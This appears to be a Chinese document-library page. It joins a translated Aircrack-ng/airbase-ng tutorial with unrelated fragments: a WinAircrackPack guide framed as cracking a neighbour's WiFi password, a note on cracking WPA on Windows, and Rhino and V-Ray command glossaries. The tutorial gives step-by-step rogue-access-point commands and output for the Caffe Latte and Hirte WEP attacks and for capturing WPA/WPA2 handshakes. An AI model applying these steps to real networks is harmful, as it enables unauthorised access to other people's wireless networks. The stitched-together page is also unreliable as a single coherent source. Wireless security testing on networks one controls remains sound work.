文档库 最新最全的文档下载
当前位置:文档库 › Aircrack命令组详解

Aircrack命令组详解

Aircrack命令组详解
Aircrack命令组详解

Aircrack命令组详解《一》

Airbase-ng

Compiled and edited by Zero&Max

前言:

近段时间大家比较关注无线安全的,到Aircrack官方网站逛了逛,找到了些关于命令的说明文档,不过是英文的,地址如下:

https://www.wendangku.net/doc/2a4149526.html,/bbs/viewthread.php?tid=11347&extra=page%3D1。而介绍文档并没有将其工作原理详细说明,Zero&Max找时间将命令的详细解释及原理给大家一一介绍。不过Zero&Max都有工作,所有命令的原理和解释从头到尾弄出来不太现实,现决定以更新的方式陆续为大家献上。文档难免有些错误,欢迎大家积极拍砖,顺便转告Zero&Max,以便我们能及时更改,谢谢!

联系方式附上:Zero Zero.chenwen@https://www.wendangku.net/doc/2a4149526.html,

Max norrizvan@https://www.wendangku.net/doc/2a4149526.html,

闲话少说,首先给大家介绍Airbase-ng命令组(以下简称Base命令)。Base命令组是针对与AP有关联的客户端进行攻击的多用途工具,其用途的多样性及灵活性可归纳为以下几种:

1.执行针对WEP加密的牛奶咖啡(Caffe Latte Attack)的客户端攻击;

2.执行针对WEP加密的牧羊人(Hirte)客户端攻击;

3.WPA/WPA2握手信息的捕获能力;

4.担当起AD-HOC AP的能力;

5.担当起完整AP的能力;

6.过滤指定的SSID或客户端的MAC地址;

7.控制重传包;

8.发送数据包的加密和接受数据包的解密。

Base命令主要意图是鼓励客户端关联到伪造的AP,而不是阻止客户端连接到合法的AP。Base运行时会产生tap interface(atx),用来解密接收包和发送加密包。

因为合法客户端一般会发送请求探测包或网络配置,而这些被探测到的帧对于绑定客户端到我们的软AP(也可以叫做伪AP)是极其重要的。这时,AP将会对任何请求进行相应的响应,让这些客户端跟据相应的airbase-ng BSSID进行验证。也就是说,此种模式会有很大可能影响同频道其他AP的正常工作。

警告:Base命令会轻易干扰你周围的AP,为了尽可能降低影响请使用过滤器。尽量不去干扰别人的网络。

使用方法: airbase-ng

Options:

-a bssid : set Access Point MAC address

设置AP MAC地址

-i iface : capture packets from this interface

包捕获接口,比喻wlan0

-w WEP key : use this WEP key to en-/decrypt packets

使用这个WEP密码来加密解密包

-h MAC : source mac for MITM mode

为MITM模式设置源MAC

-f disallow : disallow specified client MACs (default: allow)

拒绝指定MAC的客户端(默认:allow容许)

-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)

在beacons中设置WEP标志(0为不设置,1为设置,默认自动)-q : quiet (do not print statistics)

不进行打印统计

-v : verbose (print more messages)

显示更多信息

-A : Ad-Hoc Mode (allows other clients to peer)

AD-HOC模式,容许其他客户端进行端对端的连接

-Y in|out|both : external packet processing

外部数据包的处理 in(进)|out(出)|both(进、出)

-c channel : sets the channel the AP is running on

设置AP工作在指定信道

-X : hidden ESSID

隐藏ESSID

-s : force shared key authentication (default: auto)

促进共享密匙认证(默认自动)

-S : set shared key challenge length (default: 128)

设置共享密匙长度(默认128位)

-L : Caffe-Latte WEP attack (use if driver can't send frags)

牛奶咖啡WEP攻击(在驱动不支持发送碎片封包时候使用)-N : cfrag WEP attack (recommended)

牧羊WEP攻击(推荐)

Hirte attack (cfrag attack), creates arp request against wep client (long ¨Ccfrag)

-x nbpps : number of packets per second (default: 100)

每秒钟发送包的数量(默认100)

-y : disables responses to broadcast probes

关闭广播探测反馈

-0 : set all WPA,WEP,open tags. can't be used with -z & -Z

设置所有WPA,WEP,OPEN标签,不能与-z&-Z同时使用

-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104

设置WPA1标签1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 -Z type : same as -z, but for WPA2

功能与-z相同,但是指WPA2

-V type : fake EAPOL 1=MD5 2=SHA1 3=auto

伪造EAPOL 1=MD5 2=SHA1 3=auto

-F prefix : write all sent and received frames into pcap file

将所有接收和发射的包写入pcap文件

Filter options:

--bssid MAC : BSSID to filter/use

使用BSSID作为过滤器

--bssids file : read a list of BSSIDs out of that file

从指定文件读取BSSIDs列表

--client MAC : MAC of client to filter

使用网卡MAC地址过滤

--clients file : read a list of MACs out of that file

从指定文件读取MAC地址列表

--essid ESSID : specify a single ESSID (default: default)

指定一个ESSID(默认default)

--essids file : read a list of ESSIDs out of that file

从指定文件读取ESSID列表

--help : Displays this usage screen

显示这个屏幕

说明:

1.Caffe Latte Attack

1)Caffe Latte Attack解释:

先来说说Caffe Latte Attack(关于这个名字的由来,我想是这样的,其本意是牛奶咖啡。意大利人比较喜欢喝。所以在好多公共场所,比如说starbucks,机场火车站,都提供这个,然而,众所周知,无线发展到今天,破解也是跟得很紧,自然这些地方也不能避免,但是在这些地方对破解的要求比我们在家的要求更高,对,那就是速度要求。如果你对面坐着一个人,拿着Iphone,你刚刚开始破解他就去登机口了,那还破个屁啊。哈哈。所以 caffelatte 这个词就被用上了,两层意思:1. 在公共场合进行破解2. 喝一杯咖啡的时间破解,说通俗点中国话就是一杯茶或一支烟的工夫。)

2)Caffe Latte Attack攻击:

在说这个攻击前,先给大家解释一下 GARP 也就是gratuitous ARP,称作为“无为”或“无故”ARP。

a.ARP相关解释

1.ARP协议概述

ARP协议和ICMP协议是常用的TCP/IP底层协议。在对网络故障进行诊断的时候,它们也是最常用的协议。

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。

2. ARP工作原理

2.1ARP工作过程

当一个基于TCP/IP的应用程序需要从一台主机发送数据给另一台主机时,它把信息分割并封装成包,附上目的主机的IP地址。然后,寻找IP地址到实际MAC地址的映射,这需要发送ARP广播消息。当ARP找到了目的主机MAC地址后,就可以形成待发送帧的完整以太网帧头。最后,协议栈将IP包封装到以太网帧中进行传送。

如图1所示,描述了ARP广播过程。

图1 ARP广播

在图1中,当主机A要和主机B通信(如主机A Ping主机B)时。主机A会先检查其ARP缓存内是否有主机B的MAC地址。如果没有,主机A会发送一个ARP请求广播包,此包内包含着其欲与之通信的主机的IP地址,也就是主机B的IP地址。当主机B收到此广播后,会将自己的MAC地址利用ARP响应包传给主机A,并更新自己的ARP缓存,也就是同时将主机A的IP地址/MAC地址对保存起来,以供后面使用。主机A在得到主机B的MAC地址后,就可以与主机B通信了。同时,主机A也将主机B的IP地址/MAC地址对保存在自己的ARP缓存内。

2.2ARP报文格式

ARP报文被封装在以太网帧头部中传输,如图2所示,是ARP请求协议报文头部格式。

图2 ARP请求协议报文头部格式

图2中黄色的部分是以太网(这里是Ethernet II类型)的帧头部。其中,第一个字段是广播类型的MAC地址:0XFF-FF-FF-FF-FF-FF,其目标是网络上的所有主机。第二个字段是源MAC地址,即请求地址解析的主机MAC地址。第三个字段是协议类型,这里用0X0806代表封装的上层协议是ARP协议。

接下来是ARP协议报文部分。其中各个字段的含义如下:

硬件类型:表明ARP实现在何种类型的网络上。

协议类型:代表解析协议(上层协议)。这里,一般是0800,即IP。

硬件地址长度:MAC地址长度,此处为6个字节。

协议地址长度:IP地址长度,此处为4个字节。

操作类型:代表ARP数据包类型。0表示ARP请求数据包,1表示ARP应答数据包。

源MAC地址:发送端MAC地址。

源IP地址:代表发送端协议地址(IP地址)。

目标MAC地址:目的端MAC地址(待填充)。

目标IP地址:代表目的端协议地址(IP地址)。

ARP应答协议报文和ARP请求协议报文类似。不同的是,此时,以太网帧头部的目标MAC地址为发送ARP地址解析请求的主机的MAC地址,而源MAC地址为被解析的主机的MAC地址。同时,操作类型字段为1,表示ARP应答数据包,目标MAC地址字段被填充以目标MAC地址。

2.3ARP缓冲区

为了节省ARP缓冲区内存,被解析过的ARP条目的寿命都是有限的。如果一段时间内该条目没有被参考过,则条目被自动删除。在工作站PC的Windows环境中,ARP条目的寿命是2分钟,在大部分Cisco交换机中,该值是5分钟。

在工作站PC的Windows环境中,可以使用命令arp -a查看当前的ARP缓存,如图3所示。而在路由器和交换机中可以命令show arp完成相同的功能,如图4所示。

图3 Windows环境下,命令arp -a的输出

图4路由器中show arp命令的输出

注意:ARP不能通过IP路由器发送广播,所以不能用来确定远程网络设备的硬件地址。对于目标主机位于远程网络的情况,IP利用ARP确定默认网关(路由器)的硬件地址,并将数据包发到默认网关,由路由器按它自己的方式转发数据包。

3. 反向ARP

反向ARP(Reverse ARP,RARP)用于把物理地址(MAC地址)转换到对应的 IP 地址。例如,在无盘工作站启动的时候,因为无法从自身的操作系统获得自己的IP地址配置信息。这时,无盘工作站可发送广播请求获得自己的IP地址信息,而RARP服务器则响应IP 请求消息-为无盘工作站分配1个未用的IP地址(通过发送RARP应答包)。

反向ARP(RARP)在很大程度上已被BOOTP、DHCP所替代,后面这两种协议对RARP 的改进是可以提供除了IP地址外的其它更多的信息,如默认网关、DNS服务器的IP地址等信息。

4. 代理ARP

代理ARP(PROXY ARP)也被称作混杂ARP(Promiscuous ARP)(RFC 925、1027)一般被像路由器这样的设备使用--用来代替处于另一个网段的主机回答本网段主机的ARP请求。

下面是代理ARP的应用之一,如图5所示,主机PC1(192.168.20.66/24)需要向主机

PC2(192.168.20.20/24)发送报文,因为主机PC1不知道子网的存在且和目标主机PC2在同一主网络网段,所以主机PC1将发送ARP请求广播报文请求192.168.20.20的MAC地址。这时,路由器将识别出报文的目标地址属于另一个子网(注意,路由器的接口IP地址配置的是28位的掩码),因此向请求主机回复自己的硬件地址(https://www.wendangku.net/doc/2a4149526.html,a0)。之后,PC1将发往PC2的数据包都发往MAC地址https://www.wendangku.net/doc/2a4149526.html,a0(路由器的接口E0/0),由路由器将数据包转发到目标主机PC2。(接下来路由器将为PC2做同样的代理发送数据包的工作)。这种ARP 使得子网化网络拓扑对于主机来说时透明的(或者可以说是路由器以一个不真实的PC2的MAC地址欺骗了源主机PC1)。

图5代理ARP

5. 无故ARP

无故(Gratuitous ARP,GARP)ARP也称为无为ARP。主机有时会使用自己的IP地址作为目标地址发送ARP请求。这种ARP请求称为无故ARP,GARP,主要有两个用途:(1)检查重复地址(如果收到ARP响应表明存在重复地址)。

(2)用于通告一个新的数据链路标识。当一个设备收到一个arp请求时,发现arp缓冲区中已有发送者的IP地址,则更新此IP地址的MAC地址条目。

如图6所示,显示了一台Cisco路由器在其加电启动后、引导过程中向网络宣布自己的

一个以太网接口(Ethernet 0)的MAC地址以及IP地址的包。

图6无故ARP

从图中可以看出,这个ARP包的类型编码是2,代表一个ARP应答消息(但是之前并没有对此IP的ARP请求消息)。这个ARP包的源硬件地址(MAC地址)是路由器的这个接口的MAC地址,目标硬件地址(MAC地址)使用的是广播地址(FF-FF-FF-FF-FF-FF);而源和目标协议地址(IP地址)都是此接口自身的IP地址。此ARP包用于设备(路由器)向网络宣告自身的IP地址和MAC地址映射,也用于检查是否有重复(冲突)的IP地址。

b.GARP相关解释

主机有时会使用自己的IP地址作为目标地址发送ARP请求。这种ARP请求称为无故ARP,GARP,主要有两个用途:

(1) 检查重复地址(如果收到ARP响应表明存在重复地址)。

(2) 用于通告一个新的数据链路标识。当一个设备收到一个arp请求时,发现arp缓冲区中已有发送者的IP地址,则更新此IP地址的MAC地址条目。

Base命令组中包含Caffe Latte攻击,此攻击也可以通过大家所熟知的aireplay-ng -6 命令进行实施。也可以用-L或者-caffe-latte。此-L攻击主要是针对客户端在等待arp广播请求时所捕获的GRAP。然后对发送者的MAC和IP进行修改,并修正ICV(CRC32)值,再把修改过的包送回到客户端。此攻击在实际运用中的意义在于,即使当在设置了静态IP,关闭DHCP并在子网IP169.254.x.x自行分配ip的情况下,只要在2层建立了连接,系统就会发送GARP。那么破解也就成为可能。

3)实例:

此攻击可以从客户端得到wep密匙。此攻击取决于客户端与伪AP连接后所接收到的GARP

请求。

窗口中输入:

airbase-ng -c 9 -e teddy -L -W 1 wlan0

?-c 指定工作信道

?-e 指定SSID

?-L指定攻击模式此处为牛奶咖啡攻击

?-w 1 通过beacon来指定WEP

?wlan0指定捕获无线数据包的端口

系统回显:

18:57:54 Created tap interface at0

18:57:55 Client 00:0F:B5:AB:CB:9D associated (WEP) to ESSID: "teddy"

此时,在另外一个窗口中输入:

airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0

?-c 指定工作通道

?-d 捕获客户端发送到00:06:62:F8:1E:2C(伪造AP)的有效数据包—可选

?-w 定义捕获数据文件包的名称

?wlan0 指定用来捕获数据的无线端口

如下便是使用base成功获取数据包并进行攻击的窗口:

CH 9 ][ Elapsed: 8 mins ][ 2008-03-20 19:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:06:62:F8:1E:2C 100 29 970 14398 33 9 54 WEP WEP teddy BSSID STATION PWR Rate Lost Packets Probes

00:06:62:F8:1E:2C 00:0F:B5:AB:CB:9D 89 2-48 0 134362

同时,可以另起窗口使用aircrack-ng 进行wep破解

第二个是关于airbase 下SKC(shared key capture)

输入:

airbase-ng -c 9 -e teddy -s -W 1 wlan0

?-c 9 指定工作通道

?-e teddy 指定SSID

?-s 迫使共享密匙验证

?-w1 使用beacon指定WEP

?Wlan0指定捕获无线数据包的端口

系统回显:

15:08:31 Created tap interface at0

15:13:38 Got 140 bytes keystream: 00:0F:B5:88:AC:82

15:13:38 SKA from 00:0F:B5:88:AC:82

15:13:38 Client 00:0F:B5:88:AC:82 associated to ESSID: "teddy"

最后三行系统信息只在客户端与伪AP连接时出现

此时,在另外一个窗口运行:

airodump-ng -c 9 wlan0

?-c 指定工作信道

?Wlan0指定捕获无线数据包的端口

如下便是成功捕获SKA的运行窗口,请注意右上角的00:C0:CA:19:F9:65

CH 9 ][ Elapsed: 9 mins ][ 2008-03-12 15:13 ][ 140 bytes keystream: 00:C0:CA:19:F9:65

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:C0:CA:19:F9:65 87 92 5310 0 0 9 54 WEP WEP SKA teddy BSSID STATION PWR Rate Lost Packets Probes

00:C0:CA:19:F9:65 00:0F:B5:88:AC:82 83 0- 1 0 4096 teddy

2.Hirte

牧羊人攻击是一种可以使用任何IP或ARP包的客户段攻击模式。接下来我们来介绍整

个工作原理:

牧羊人攻击的基本思想是:生成个ARP请求包后发送回给客户端,以便客户端做出相

应的相应。

要完成牧羊人攻击必须要先从客户端获取到一个ARP包或者是IP包,接着我们将篡改

其内容从而生成一个ARP请求。

备注-ARP数据包说明:这个ARP请求包中33字节处必须为目标客户端的IP地址,目标

MAC地址必须全为0。(在实际情况中目标MAC地址可以为任意值。从客户端接收的包中

源IP地址有着固定的位置,ARP包在23字节处,IP包在21字节处。ARP不是在包的长度

为68附加广播目的地址那就是86字节处附加广播目的地址。)否则可能就是IP包。

为了将一个有效的ARP请求发回给客户端,我们需要篡改包中33字节处的源IP地址。

当然你不能简单地篡改此位置,否则将无法得到有效的包。所以我们有了分解包的想法。ARP

请求会发送给客户端2个帧,第一个帧的长度是经过特意挑选以便篡改33字节处的源IP地

址,最终将由客户端重新封装此帧。第二个帧是来源于客户端的未经修改的原始包。而对于

IP数据包而言,采用同样的手法即可。在实际环境中,由于存在各种客观原因,为了得到更

多可用的PRGA,这三种帧将被封装到原始包中使用。无论任何情况下,位翻转是用来确保

CRC的正确性。此外位翻转还被用来确保包中的源ARP mac地址是非多播的。

AP模式下的牧羊人攻击

这种攻击可以从客户端获取WEP密钥。要完成牧羊人攻击必须在客户端关联到伪AP后

获取到一个ARP包或者是IP包。

输入:

airbase-ng -c 9 -e teddy -N -W 1 rausb0

?-c 指定工作信道

?-e 指定SSID

?-N指定牧羊人攻击模式

?-w 1 通过beacon来指定WEP

?wlan0指定捕获无线数据包的端口

系统回显:

18:57:54 Created tap interface at0

18:57:55 Client 00:0F:B5:AB:CB:9D associated (WEP) to ESSID: "teddy"

另一窗口输入:

airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0

?-c 9 指定工作信道

?-d捕获客户端发送到00:06:62:F8:1E:2C(伪造AP)的有效数据包—可选

?-w定义捕获数据文件包的名称

?Wlan0指定捕获无线数据包的端口

以下是当airbase-ng成功从客户端获取到数据包及开始攻击:

CH 9 ][ Elapsed: 8 mins ][ 2008-03-20 19:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:06:62:F8:1E:2C 100 29 970 14398 33 9 54 WEP WEP teddy BSSID STATION PWR Rate Lost Packets Probes

00:06:62:F8:1E:2C 00:0F:B5:AB:CB:9D 89 2-48 0 134362

也可直接只用airbase-ng 的“-F 文件名”直接写入捕获文件

同时,可以另起窗口使用aircrack-ng 进行wep破解

AD-HOC模式下的牧羊人攻击

这种攻击可以从客户端获取WEP密钥。要完成牧羊人攻击必须在客户端关联到伪AP后

获取到一个ARP包或者是IP包。

输入:

airbase-ng -c 9 -e teddy -N -W 1 -A wlan0

?-c 指定工作信道

?-e 指定SSID

?-N指定牧羊人攻击模式

?-w 1 通过beacon来指定WEP

?-A 指定为AD-HOC模式

?wlan0指定捕获无线数据包的端口

3. WPA握手信息的捕获

输入:

airbase-ng -c 9 -e teddy -z 2 rausb0

?-c 指定工作信道

?-e 指定SSID

?-z 2指定为TKIP

?wlan0指定捕获无线数据包的端口

系统回显:

10:17:24 Created tap interface at0

10:22:13 Client 00:0F:B5:AB:CB:9D associated (WPA1;TKIP) to ESSID: "teddy"

最后一行的出现表示客户端已成功关联

开启另一窗口输入:

airodump-ng -c 9 -d 00:C0:C6:94:F4:87 -w cfrag wlan0

?-c 9 指定工作信道

?-d捕获客户端发送到00:06:62:F8:1E:2C(伪造AP)的有效数据包—可选

?-w定义捕获数据文件包的名称

?Wlan0指定捕获无线数据包的端口

当成功获取到WPA握手信息,将在窗口右边显示“WPA handshake: 00:C0:C6:94:F4:87”

CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:C0:C6:94:F4:87 100 70 1602 14 0 9 54 WPA TKIP PSK teddy BSSID STATION PWR Rate Lost Packets Probes

00:C0:C6:94:F4:87 00:0F:B5:AB:CB:9D 86 2- 1 0 75

也可直接只用airbase-ng 的“-F 文件名”直接写入捕获文件

使用“aircrack-ng cfrag-01.cap”验证WPA握手信息:

Opening cfrag-01.cap

Read 114392 packets.

# BSSID ESSID Encryption

1 00:C0:C6:94:F4:87 teddy WPA (1 handshake)

4. WPA2握手信息的捕获

WPA2握手信息的捕获基本上和WPA相同,不同的是使用-Z 4 (CCMP 密码) 替换 -z 2. airbase-ng -c 9 -e teddy -Z 4 rausb0

蹭网工具WinAirCrackPack工具包使用介绍

使用蹭网工具WinAirCrackPack工具包\BT3 (BackTrack 3)破解 首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。 NetStumbler 下载地址https://www.wendangku.net/doc/2a4149526.html,/downloads/ 通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为‘已加密’,根据802.11b所支持的算法标准,该算法确定为WEP。有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。 破解下载Win32版AirCrack程序集---WinAirCrackPack工具包(下载地址:https://www.wendangku.net/doc/2a4149526.html,/download/wireless/aircrack/WinAircrackPack.zip)。解压缩后得到一个大概4MB的目录,其中包括六个EXE文件:aircrack.exe 原WIN32版aircrack程序airdecap.exe WEP/WPA解码程序 airodump.exe 数据帧捕捉程序Updater.exe WIN32版aircrack的升级程序 WinAircrack.exe WIN32版aircrack图形前端wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序我们本次实验的目的是通过捕捉适当的数据帧进行IV(初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY用)两个程序就可以了。 首先打开ariodump.exe程序,按照下述操作:

V-Ray for Rhino 4 中英文对照

V-Ray for Rhino 4 中英文对照 Global Switches(全局光照开关设置) Materials(材质)Reflection/Refraction(反射/折射) Max Depth(最大深度)2 Max Transp.Level(最大透明级别)50 Transp. Cutoff(透明终止值)0.001 Maps(帖图)Filter Maps(过滤贴图)Glossy Effects(光滑效果)Override materials(覆盖材质) Indirect Illumination(间接照明)Don't render final image(不渲染最终的图象)Raytracing(光线跟踪)Secondary ray bias(二级光线偏移)0 Render(渲染)Batch render(批量渲染)Low thread priority(低线程优先权)Show progress window(显示步进窗口) Lighting(照明)Lights(灯光)Hidden Lights(隐蔽灯光) Default Lights(缺省灯光)Shadows(阴影)Show GI Only(只显示全局光照)Gamma Correction(伽玛值修正)Output(导出)2.2 Input(导入)2.2 L Correct RGB(修正三原色)Correct LDR Textures(修正LDR材质) System(系统设置) Raycaster Params(光线追踪参数) Max Depth(最大深度)60 Min Leaf(最小树叶)0 Face/Level(面/级)2 Mem Limit(限制)400 Distributed Rendering(分布式渲染设置) Distributed Rendering(分布式渲染)Settings(设置) Region Division(区域分割)Width(宽)48 Height(高)48 Means(方法):Region W/H(区域宽/高)▲

WinAircrackPack-破解无线密码使用教程

WinAircrackPack 破解你邻居家的无线WIFI密码 破解静态WEP KEY全过程 发现 首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行…踩点?(数据搜集)。 NetStumbler 下载地址https://www.wendangku.net/doc/2a4149526.html,/downloads/ 通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为…已加密?,根据802.11b所支持的算法标准,该算法确定为WEP。有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption 属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。 破解 下载Win32版AirCrack程序集---WinAirCrackPack工具包(下载地址:https://www.wendangku.net/doc/2a4149526.html,/download/wireless/aircrack/WinAircrackPack.zip)。解压缩后得到一个大概4MB的目录,其中包括六个EXE文件: aircrack.exe 原WIN32版aircrack程序 airdecap.exe WEP/WPA解码程序 airodump.exe 数据帧捕捉程序 Updater.exe WIN32版aircrack的升级程序 WinAircrack.exe WIN32版aircrack图形前端 wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序 我们本次实验的目的是通过捕捉适当的数据帧进行IV(初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY 用)两个程序就可以了。 首先打开ariodump.exe程序,按照下述操作:

GH命令英文详解

G H命令英文详解 Company Document number:WTUT-WT88Y-W8BBGB-BWYTT-19998

1.Params:参数Geometry:几何体 Box:立方体BRep:边界表现形式Circle:圆 CircularArc:圆弧 Curve:曲线 Geometry:几何 Line:线 Mesh:网格面 Plane:平面 Point:点 Surface:表面 Twistedbox:扭曲的立方体Vector:矢量 Primitive:数据元素Boolean:布尔型 Colour:ARGB色彩 Data:数据 DataPath:数据分支 Integer:整型 Interval:区间

Interval2:二维区间Number:双精度型浮点数Shader:着色器 String:字符串型 Time:日期型 Special:专门的 BarGraph:条形统计图BooleanToggle:布尔值切换器ColourSwatch:色卡CustomPreview:预览自定义Gradient:多色彩渐变GraphMapper: NumberSlider:数字滑动条Panel:数据显示面板ParamViewer:参数结构查看器Receiver:数据接收器 2.Logic逻辑 Boolean:布尔运算GateAnd:并集GateAndTernary:三元并集GateMajority: GateNand:

GateNor: GateNot: GateOr: GateOrTernary: GateXnor: GateXor: List:列表 Dispatch:分配(把一个列表中的项目分派到两个目标列表中)ListItem:清单项 ListLength:列表长度(计算列表的长度) NullItem:空值(测试一个数据项是否无效)ReverseList:反转列表 ShiftList:移动列表 SortList:分类列表 SplitList:分拆列表 SubList:次级列表(从一个列表中提取子集) Weave:编排(使用自定义的式样编排输入流的设置)Script:脚本 DotNETC#Script:C#脚本 DotNETVBScript:VB脚本 F1:一元函数 F2:二元函数

Aircrack-ng for Windows

教你利用Aircrack-ng for Windows破解WPA 2011-11-25 13:13 佚名 https://www.wendangku.net/doc/2a4149526.html, 我要评论(0)字号:T | T 由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将 无线网卡载入,以便攻击工具能够正常使用。在无线攻击套装Aircrack-ng的Windows版 本下内置了这样的工具,就是airserv-ng。 AD:2013云计算架构师峰会超低价抢票中由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工 具将无线网卡载入,以便攻击工具能够正常使用。在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具,就是airserv-ng。 步骤1:打开CMD,通过cd命令进入到aircrack-ngforWindows版本所在目录,输入airserv-ng,可以看到如图5-29所示的内容。 图5-29在CMD下运行airserv-ng 参数解释: *-p,指定监听的端口,即提供连接服务的端口,默认为666; *-d,载入无线网卡设备,需要驱动支持; *-c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1; *-v,调试级别设定。 作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解做准备,命令如下(注意:在命令中出现的引号一律使用英文下的引号输入):airserv-ng-d"commview.dll|debug" 或者

airserv-ng-d"commview.dll|{myadapterid}" 输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此时airserv-ng就在正常载入驱动后,同时开始监听本地的666端口。换句话说,airserv-ng提供的是该无线网卡的网络服务,其他计算机上的用户也可以连接到这个 端口来使用这块网卡,如图5-30所示。 图5-30airserv-ng工作中 步骤2:现在可以使用airodump-ng来搜索当前无线环境了。注意,要另开启一个CMD,再输入如下命令: airodump-ng127.0.0.1:666 这里在IP地址处输入为本机即127.0.0.1,端口采用的是默认的666。 图5-31在CMD下运行airodump-ng 如图5-31所示,当确定预攻击目标AP的频道后,使用组合键Ctrl+C中断,即可使用如下参数来精确定位目标: airodump-ng--channelnumber-wfilename127.0.0.1:666 这里输入“airodump-ng--channel7-wonewpa127.0.0.1:666”,回车后可看到如图5-32所示的内容。

rhino命令中英文对照

一、File〈文件〉 New-----------------------〈新建〉 Reset---------------------〈重置〉 Open----------------------〈打开〉 Save-----------------------〈保存〉Save As-------------------〈保存为〉Save selected----------〈保存选择〉XRef Objects -----------〈外部引用物体〉XRef Scenes -----------〈外部引用场景〉Merge --------------------〈合并〉Merge Animation--------〈合并动画动作〉Replace------------------〈替换〉 Import---------------------〈输入〉Export---------------------〈输出〉Export Selected----------〈选择输出〉Archive--------------------〈存档〉Summary Info-----------〈摘要信息〉 File Properties----------〈文件属性〉View Image File--------〈显示图像文件〉History--------------------〈历史〉 Exit----------------------〈退出〉 二、Edit〈菜单〉 Undo or Redo----------〈取消/重做〉 Hold and fetch---------〈保留/引用〉Delete----------------〈删除〉 Clone--------------------〈克隆〉 Select All-----------------〈全部选择〉Select None-------------〈空出选择〉Select Invert-------------〈反向选择〉Select By-----------------〈参考选择〉Color--------------------〈颜色选择〉Name---------------------〈名字选择〉Rectangular Region-----〈矩形选择〉Circular Region--------〈圆形选择〉Fabce Region----------〈连点选择〉Lasso Region----------〈套索选择〉Region:-------------------〈区域选择〉Window-----------------〈包含〉 Crossing-----------------〈相交〉

Rhino全部命令简要说明Word版

Rhino命令列表 Tools > Polygon Primitives > 3-D Face Mesh and STL Tools View>Viewport Layout > 3 Viewports Viewport Layout Viewport Layout View > Viewport Layout > 4 Viewports Edit>Select Control Points>Add next U Select Points Edit > Select Control Points > Add nextV Select Points Edit > Select Control Points > Add prev U Select Points Edit > Select Control Points > Add prevV Select Points View > Background Bitmap > Align Background Bitmap Edit> Layers> All Layers On AllLayersOn Object Snap Analyze > Angle Analyze Curve> From Objects> Apply UV Curves Curve From Object Tools > Polygon Mesh > Apply to Surface Mesh Curve>Arc>Center, Start, Angle Arc and Main Curve>Arc>3 Points Arc

Curve>Arc>Start, End, Direction Arc Curve>Arc>Tangent, Tangent, Radius Arc Analyze > Mass Properties > Area Mass Properties Analyze>Mass Properties > Area Centroid Mass Properties Analyze>Mass Properties>Area Moments Mass Properties Transform > Array > Rectangular Main, Transform, and Array Transform > Array > Along Curve Array Transform > Array > Polar Array Transform > Array > Along Surface ArraySrf Annotate Annotate View > Set View > Back Set View Sphere Sphere Transform > Bend Transform Curve>Line>Bisector Lines Curve>Blend Curve Tools Surface > Blend Surface Tools Solid > Difference Solid Tools

vray for rhino中英文对照

Global Switches(全局光照开关设置) Materials(材质)Reflection/Refraction(反射/折射) Max Depth(最大深度)2 Max Transp.Level(最大透明级别)50 Transp. Cutoff(透明终止值)0.001 Maps(帖图)Filter Maps(过滤贴图) Glossy Effects(光滑效果)Override materials(覆盖材质) Indirect Illumination(间接照明)Don't render final image(不渲染最终的图象) Raytracing(光线跟踪)Secondary ray bias(二级光线偏移)0 Render(渲染)Batch render(批量渲染)Low thread priority(低线程优先权) Show progress window(显示步进窗口) Lighting(照明)Lights(灯光)Hidden Lights(隐蔽灯光)Default Lights(缺省灯光)Shadows(阴影)Show GI Only(只显示全局光照) Gamma Correction(伽玛值修正)Output(导出)2.2 Input(导入)2.2 L Correct RGB(修正三原色)Correct LDR Textures(修正LDR材质) System(系统设置) Raycaster Params(光线追踪参数) Max Depth(最大深度)60 Min Leaf(最小树叶)0

